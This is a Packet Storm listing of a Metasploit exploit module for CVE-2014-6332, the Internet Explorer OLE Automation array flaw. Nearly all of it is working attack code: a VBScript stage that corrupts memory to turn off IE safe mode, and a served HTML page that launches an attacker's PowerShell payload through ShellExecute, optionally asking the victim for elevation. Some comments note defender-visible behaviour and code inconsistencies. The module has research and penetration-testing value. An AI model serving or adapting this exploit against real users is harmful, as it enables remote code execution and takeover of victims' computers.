packetstormYuangePACKETSTORM:129326

Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution

2014-11-30 00:00:00
Yuange
packetstormsecurity.com
54

0.974 High

EPSS

Percentile

99.9%

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
require 'msf/core'  
require 'msf/core/exploit/powershell'  
  
class Metasploit4 < Msf::Exploit::Remote
  # Browser exploit module for CVE-2014-6332 (MS14-064), the Windows OLE
  # Automation array vulnerability. The served page runs a VBScript stage
  # (vbs_prepare) that ends by calling runaaaa(), which launches
  # powershell.exe with the selected payload through
  # Shell.Application.ShellExecute (see get_html).
  #
  # Defender view: the observable behaviour on the endpoint is Internet
  # Explorer (with the page forced into IE8 document mode) spawning
  # powershell.exe as a child process. On Protected Mode the launch needs
  # user confirmation, per the Description below.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Powershell

  # BrowserAutopwn registration: IE 3.0-10.0 on Windows, JavaScript required.
  # NOTE(review): ua_maxver is "10.0" and BrowserRequirements below accepts
  # versions 4..10 only, while the Description claims IE 3 through 11; as
  # written the module will not serve the exploit to IE 3 or IE 11.
  autopwn_info({
    :ua_name => HttpClients::IE,
    :ua_minver => "3.0",
    :ua_maxver => "10.0",
    :javascript => true,
    :os_name => OperatingSystems::Match::WINDOWS,
    :rank => ExcellentRanking
  })

  # Module metadata (name, references, target, browser requirements) and the
  # TRYUAC option, which chooses the ShellExecute verb used in get_html.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
      'Description' => %q{
This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
Powershell is required on the target machine. On Internet Explorer versions using Protected Mode,
the user has to manually allow powershell.exe to execute in order to be compromised.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Robert Freeman', # IBM X-Force
          'yuange', # twitter.com/yuange75
          'Rik van Duijn', # twitter.com/rikvduijn
          'Wesley Neelen', # security[at]forsec.nl
          'GradiusX <francescomifsud[at]gmail.com>',
          'b33f', # @FuzzySec
        ],
      'References' =>
        [
          [ 'CVE', '2014-6332' ],
          [ 'MSB', 'MS14-064' ],
          [ 'OSVDB', '114533' ],
          [ 'EDB', '35229' ],
          [ 'EDB', '35308' ],
          [ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ],
          [ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ]
        ],
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
        ],
      # Only serves to IE 4..10 on Windows x86; fingerprint may come from
      # script or headers.
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          :ua_name => HttpClients::IE,
          :os_name => /win/i,
          :arch => 'x86',
          :ua_ver => lambda { |ver| ver.to_i.between?(4, 10) }
        },
      'DefaultOptions' =>
        {
          'HTTP::compression' => 'gzip'
        },
      'Payload' =>
        {
          'BadChars' => "\x00"
        },
      'Privileged' => false,
      'DisclosureDate' => "Nov 13 2014",
      'DefaultTarget' => 0))

    # TRYUAC=true uses the 'runas' verb (UAC prompt on the victim),
    # otherwise 'open'; see get_html.
    register_options(
      [
        OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
      ], self.class )

  end

  # Builds the VBScript stage embedded in the served page.
  #
  # What the script does, as far as the code below shows:
  #  * Begin() returns early when the User-Agent contains "Win64" or lacks
  #    "MSIE"; otherwise it parses the IE major version into intVersion.
  #  * Create() calls Over() up to 401 times. Over() grows the dynamic array
  #    aa with ReDim Preserve to a2 = a0 + &h8000000 and then inspects the
  #    VarType of a neighbouring element for the marker values &h2f66 or
  #    &hB9AD (the latter also sets win9x=1). The oversized ReDim Preserve
  #    appears to be the trigger for the OLE Automation array bug — confirm
  #    against the referenced write-ups.
  #  * mydata()/ReadMemo()/setnotsafemode() then use the corrupted arrays to
  #    read values and write ab(4) at offset &h11c+k where the value 14 is
  #    found at &h120+k, after which runaaaa() is called. runaaaa is defined
  #    in get_html, not in this string.
  #  * For intVersion < 4 the script calls runshellcode(), which is not
  #    defined anywhere in this module, so that branch cannot succeed as
  #    written.
  #
  # NOTE(review): the bare identifier `neline` after the top-level Begin()
  # call is not defined anywhere; Begin() has already executed by then and
  # the script is not Option Explicit, so it looks inert — verify.
  #
  # @return [String] the VBScript source (string content unchanged)
  def vbs_prepare()
    code = %Q|
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

neline
function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0) then
exit function
end if

if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function

function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runaaaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)
end function

|

  end

  # Renders the exploit page.
  #
  # TRYUAC selects the ShellExecute verb: 'runas' (elevation prompt on the
  # victim, per the option description) or 'open'. The PowerShell command
  # line comes from cmd_psh_payload with :remove_comspec; the leading
  # "powershell.exe " is sliced off because ShellExecute receives
  # "powershell.exe" as the file and the remainder as its arguments.
  # The X-UA-Compatible meta tag requests IE8 emulation — presumably so the
  # VBScript blocks are honoured in a legacy document mode; confirm.
  #
  # @return [String] the HTML page containing runaaaa() and the vbs_prepare stage
  def get_html()

    if datastore['TRYUAC']
      tryuac = 'runas'
    else
      tryuac = 'open'
    end

    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
    payl.slice! "powershell.exe "
    prep = vbs_prepare()

    html = %Q|
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<script language="VBScript">
function runaaaa()
On Error Resume Next

set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0

end function
</script>
<script language="VBScript">
#{prep}
</script>
</body>
</html>
|

  end

  # BrowserExploitServer callback: logs the requested URI and serves the
  # page built by get_html. target_info is not used here.
  #
  # @param cli [Object] the connected client
  # @param request [Object] the HTTP request; only #uri is read
  # @param target_info [Hash] browser fingerprint supplied by the server (unused)
  def on_request_exploit(cli, request, target_info)
    print_status("Requesting: #{request.uri}")
    send_exploit_html(cli, get_html())
  end

end
  
`